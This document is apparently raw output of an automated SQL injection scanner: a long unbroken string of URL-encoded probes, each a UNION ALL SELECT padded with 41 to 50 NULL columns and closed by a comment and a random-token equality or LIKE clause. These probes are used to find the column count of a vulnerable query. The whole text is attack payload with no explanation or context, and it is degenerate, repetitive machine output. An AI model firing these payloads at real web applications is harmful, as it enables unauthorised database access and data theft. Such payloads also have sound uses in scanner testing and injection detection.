1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22csxP%22%3D%22csxP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22LxVc%22%3D%22LxVc 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22KtVl%22%3D%22KtVl 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22MSOF%22%3D%22MSOF 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ALLP%22%3D%22ALLP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22NemP%22%3D%22NemP 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22cBHC%22%3D%22cBHC 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IskH%22%3D%22IskH 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22HvbI%22%3D%22HvbI 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22SyWD%22%3D%22SyWD 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22aflR%22%3D%22aflR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22EPhn%22%3D%22EPhn 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22wCsH%22%3D%22wCsH 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22rgfW%22%3D%22rgfW 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Wdro%22%3D%22Wdro 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22fRSC%22%3D%22fRSC 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22rgNn%22%20LIKE%20%22rgNn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IkAG%22%20LIKE%20%22IkAG 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22wvyW%22%20LIKE%20%22wvyW 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22AGae%22%20LIKE%20%22AGae 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ViTE%22%20LIKE%20%22ViTE 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22UUPp%22%20LIKE%20%22UUPp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22wgQG%22%20LIKE%20%22wgQG 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22XKMk%22%20LIKE%20%22XKMk 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22kdUb%22%20LIKE%20%22kdUb 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22sHRw%22%20LIKE%20%22sHRw 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22kGHJ%22%20LIKE%20%22kGHJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22zGSc%22%20LIKE%20%22zGSc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22fEPI%22%20LIKE%20%22fEPI 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22eozG%22%20LIKE%20%22eozG 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22PtZB%22%20LIKE%20%22PtZB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22DyRc%22%20LIKE%20%22DyRc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22AXGl%22%20LIKE%20%22AXGl 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22lzao%22%20LIKE%20%22lzao 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22qGqq%22%20LIKE%20%22qGqq 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22HaTA%22%20LIKE%20%22HaTA 